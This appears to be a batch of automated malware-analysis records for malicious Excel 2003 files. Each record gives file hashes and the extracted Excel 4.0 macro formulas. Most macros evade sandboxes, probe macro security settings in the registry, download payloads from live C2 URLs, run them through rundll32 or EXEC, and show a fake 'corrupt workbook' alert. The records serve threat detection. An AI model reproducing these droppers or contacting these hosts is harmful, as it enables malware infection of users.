{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad8543cb6aff31789369fe43b88354dba40af67796f7a1921cf6e2b3690b02a5"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad8543cb6aff31789369fe43b88354dba40af67796f7a1921cf6e2b3690b02a5","filesize":167936,"md5":"05ff10bfea2d480d32288b6db080adb1","sha1":"ab5dd9101609e6eb4ab174bc423f1706e32d9eea","sha256":"ad8543cb6aff31789369fe43b88354dba40af67796f7a1921cf6e2b3690b02a5","sha512":"2b060b97710eee932c4538fd796c638ed1acf21ca08ae2662d2e200d1eeb9175fdb6ea4b755be96cd9fc522aec8efe1f66c9193dbdbab04a1778037e9003e6a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad8543cb6aff31789369fe43b88354dba40af67796f7a1921cf6e2b3690b02a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tWEbr7Hfa7\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad87212e2eb7c0a22ce1de01bd0b8f606e81cb46cbe45ecccb0525234de0f765"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad87212e2eb7c0a22ce1de01bd0b8f606e81cb46cbe45ecccb0525234de0f765","filesize":214016,"md5":"4e47558b3ff2983f3e5228d061fcff50","sha1":"f1e9a600b03e98d90e7b98655c8ccaeba50b09f8","sha256":"ad87212e2eb7c0a22ce1de01bd0b8f606e81cb46cbe45ecccb0525234de0f765","sha512":"5df62fbf0989d7a7852dbb5e02dbac8372f71dfbe6219c8bd2b70a3c9c72d267a2608c831ea1feb4e4e5e15058d69548746882fc321d148f032231a023ef5af5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad87212e2eb7c0a22ce1de01bd0b8f606e81cb46cbe45ecccb0525234de0f765.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mOUVU87kcW\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ad95be08c220731c4e5a8fca9d2364abebeefadaec84f62643997d90022e5f4f"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"ad95be08c220731c4e5a8fca9d2364abebeefadaec84f62643997d90022e5f4f","filesize":168960,"md5":"77054464b2c4b13be88df5401309855f","sha1":"fd50ffa9aaa9df817ea5d1b2d116355d7d289845","sha256":"ad95be08c220731c4e5a8fca9d2364abebeefadaec84f62643997d90022e5f4f","sha512":"b202935af96a1921be32935a280c3c4429eb9b6b92ae9c94684b0f2b784689f27d51dedbc1496b4d9f6f865ad742f7a4d833bb8983edf836c24deeb59c2ef7c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ad95be08c220731c4e5a8fca9d2364abebeefadaec84f62643997d90022e5f4f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Te5nOO1897\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"adb3c0262bc2c005af58ef38ab252d4b003d318517b35ef326d59df60a687e29"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"adb3c0262bc2c005af58ef38ab252d4b003d318517b35ef326d59df60a687e29","filesize":167936,"md5":"ea56302eb758689de0fa11a7c17721eb","sha1":"cbfb84f5b3bc91a4939fd08dc98840bbbc36b135","sha256":"adb3c0262bc2c005af58ef38ab252d4b003d318517b35ef326d59df60a687e29","sha512":"ff47a166a8acdc68d68f059a2d2dbf257214967cb93184141f772b35c3ad850d91b15f6e2eec465a7ea80b73a4bec796c822c41dcda20d5d6ee9e80f80a4dd0a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"adb3c0262bc2c005af58ef38ab252d4b003d318517b35ef326d59df60a687e29.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"j7wQ6xhRKI\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"adc52f640893ded9cc90a211bb06706916ec00b7286c405ce9e65bdb26077fdb"},"analysis":{"reported":"2020-04-09T16:18:17Z","score":10},"files":[{"filename":"adc52f640893ded9cc90a211bb06706916ec00b7286c405ce9e65bdb26077fdb","filesize":167424,"md5":"273b0c1929540cdb971f29ba2d496338","sha1":"9529c8ed1ad27df34687123cd658a799640f6110","sha256":"adc52f640893ded9cc90a211bb06706916ec00b7286c405ce9e65bdb26077fdb","sha512":"e501f7c3a9e4be96cef50d56e3f438bc2950ab6f6a3c820157b61096a3e2bdffaad58dd501a319f8b8a12cfbb721aee2e8e6194cf0ce02701dff9789f5533281","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"adc52f640893ded9cc90a211bb06706916ec00b7286c405ce9e65bdb26077fdb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"a2zNfP8Amz\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"addc9706bc29c33e54b8fbb60b989901384d73271eb94ce5854c762332aea647"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"addc9706bc29c33e54b8fbb60b989901384d73271eb94ce5854c762332aea647","filesize":144384,"md5":"9ba4745228e0ff948580f07debe28a86","sha1":"37bb255f795f292fb69b7f27d22def259e5fc8d6","sha256":"addc9706bc29c33e54b8fbb60b989901384d73271eb94ce5854c762332aea647","sha512":"7e452b603b6ce259cb7dc7addf8a5fd6cd656d3b1b0c30cd9d635c68339f70c7998a75d2aec64f64bf2f8a0fe317568fa369ebc6cdafedaf8f69fc33bf539f7a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"addc9706bc29c33e54b8fbb60b989901384d73271eb94ce5854c762332aea647.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"BJDnWs53bb\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"adeec49bd9016c35857d51bc303bc16865707ed7ba8613b7abc49161e8db8af1"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"adeec49bd9016c35857d51bc303bc16865707ed7ba8613b7abc49161e8db8af1","filesize":84992,"md5":"e3a9707aa9aba8c3404111f495203d8a","sha1":"d779881a1069b4d1e647bf26e26f5a0de885e8d1","sha256":"adeec49bd9016c35857d51bc303bc16865707ed7ba8613b7abc49161e8db8af1","sha512":"cb70c715a7efaa6dba4c9427398f1abead5ee025373dfaa55e09ebdc4c3cb26185e3516db8fb5a6e63ea47214ea8d69ecd49cd34da6bce22e1a3b349c835bf34","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"adeec49bd9016c35857d51bc303bc16865707ed7ba8613b7abc49161e8db8af1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vjzd2eKwop\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"adfce4b94634a1cac80fd587e4b447c2580da916f98a272b8d9130a801469ada"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"adfce4b94634a1cac80fd587e4b447c2580da916f98a272b8d9130a801469ada","filesize":167936,"md5":"796ecbc96cfb1dba2f58a846123e5e2b","sha1":"4ffcdac7ac6c0ef573a61a413defdce5c964f1d1","sha256":"adfce4b94634a1cac80fd587e4b447c2580da916f98a272b8d9130a801469ada","sha512":"b325856a6be17186c28bd67260538f073f660ba9d239bf45949b3e12f28c7c0e61e72f525d7bf94a6a2008aae9e280aa612496783b45e0f171bd0a527a90777d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"adfce4b94634a1cac80fd587e4b447c2580da916f98a272b8d9130a801469ada.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HgoXVJI55k\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ae41a1770e14face4e0f301b56c19b241fe44b0b59310744361b9789ee8ca236"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"ae41a1770e14face4e0f301b56c19b241fe44b0b59310744361b9789ee8ca236","filesize":113664,"md5":"8859ae942bbc093ae739ab40965a072d","sha1":"785e8b0fc7610c37d2b35e28475a66bb3acf0945","sha256":"ae41a1770e14face4e0f301b56c19b241fe44b0b59310744361b9789ee8ca236","sha512":"ee68afacbba9ad5cb6a8ecf5e5a1f4e676e874a9c8648de8191c2f573cf6932d98b5961157c95d51bdd86753f4bc7555b4a95110b85ac52b2a9e12d7b9276f32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ae41a1770e14face4e0f301b56c19b241fe44b0b59310744361b9789ee8ca236.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"ihB8myZYxN\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ae58b5c7230843024ebd4ae3c55ab29b9d08faa86bcde74be8898377f9d365b7"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"ae58b5c7230843024ebd4ae3c55ab29b9d08faa86bcde74be8898377f9d365b7","filesize":167936,"md5":"5dbc9973b3e895feee75470816547952","sha1":"81a47caf3c780f861bcc3612356a0433efdb790b","sha256":"ae58b5c7230843024ebd4ae3c55ab29b9d08faa86bcde74be8898377f9d365b7","sha512":"e42d8b114d6893246f35da5c99b32ae9d6a2f642f4811b26041bc9d170883bd77fbc1c53af1f34ec0573c8318336a2d2486a0bcd3a46b09a366c155ddf5488e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ae58b5c7230843024ebd4ae3c55ab29b9d08faa86bcde74be8898377f9d365b7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WotOfhLIUw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ae58ecec2396f85495d009b2de6887c8ab9c8238adb9c0e7d611b94e68df7d91"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"ae58ecec2396f85495d009b2de6887c8ab9c8238adb9c0e7d611b94e68df7d91","filesize":214528,"md5":"7bcf1b4938719ab67171844a11f0581c","sha1":"fd47a5e966ab3e33b58683201cc8f4e15d06a3cd","sha256":"ae58ecec2396f85495d009b2de6887c8ab9c8238adb9c0e7d611b94e68df7d91","sha512":"9305ad872c29c3470d82baa11b5b6afd193e4a53d9ad425ee630c1139076c7634daef23ae711f415c4bdd44fefc483b76d0c421ad2e08bf1ed6a3146a713bdaf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ae58ecec2396f85495d009b2de6887c8ab9c8238adb9c0e7d611b94e68df7d91.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qUA0oSSMSq\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ae82175a48aaa2cb661487cd710a96bf56671fe0e6e3562c034fafafc6583768"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"ae82175a48aaa2cb661487cd710a96bf56671fe0e6e3562c034fafafc6583768","filesize":209920,"md5":"e3f8f0962f93bd992409a821145f88d3","sha1":"280bf2b199056de7418606466bcbb6d2b1866230","sha256":"ae82175a48aaa2cb661487cd710a96bf56671fe0e6e3562c034fafafc6583768","sha512":"23d29703d044b9970271fa856a1b6d2288b2f44ca9815b848d85603d29ab2b0387a65ec5fc13b029a1f02997cfce8819813157a0fe89467724e1c3f6cd8239c4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ae82175a48aaa2cb661487cd710a96bf56671fe0e6e3562c034fafafc6583768.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jdiHVKRA1Y\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aebd8233fb6c534cacef13b68eba9348fd77299873a011d31295d7f1273c25be"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"aebd8233fb6c534cacef13b68eba9348fd77299873a011d31295d7f1273c25be","filesize":206336,"md5":"ae0ef7d1b936e6517e17c12d2831a93b","sha1":"f746c5fe344262f955abeb45155ec97c995c54fe","sha256":"aebd8233fb6c534cacef13b68eba9348fd77299873a011d31295d7f1273c25be","sha512":"1b45e642de64d80f963320be228fe8b76ea60eddb28c6bcae57314a711d8720f277fd8cf126cc211cfa36501226e91aac1d1da52f556bee4afba9f19321ea7a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aebd8233fb6c534cacef13b68eba9348fd77299873a011d31295d7f1273c25be.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"R7SK2KG2H6\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aebe330ea03db44a51d2153d1fe852ab6f0b62d1d1bfe5ee4744b21472e819bd"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"aebe330ea03db44a51d2153d1fe852ab6f0b62d1d1bfe5ee4744b21472e819bd","filesize":167936,"md5":"29614039b45d8c065d5afec6f28a0c04","sha1":"016815f4d4a077b2da1454eef049cfebf5c6fb21","sha256":"aebe330ea03db44a51d2153d1fe852ab6f0b62d1d1bfe5ee4744b21472e819bd","sha512":"c94a7b197988b48f2fe334cc617348df811430d69635c8ad507a8688767c16734bd5a1c9b3f93a3acf84803f0a031cefe9b0983ba9b3474d24495bdda7fdf60f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aebe330ea03db44a51d2153d1fe852ab6f0b62d1d1bfe5ee4744b21472e819bd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cYcYv1lYgy\",TRUE)\nGOTO(R$0C$19)"}}}]}
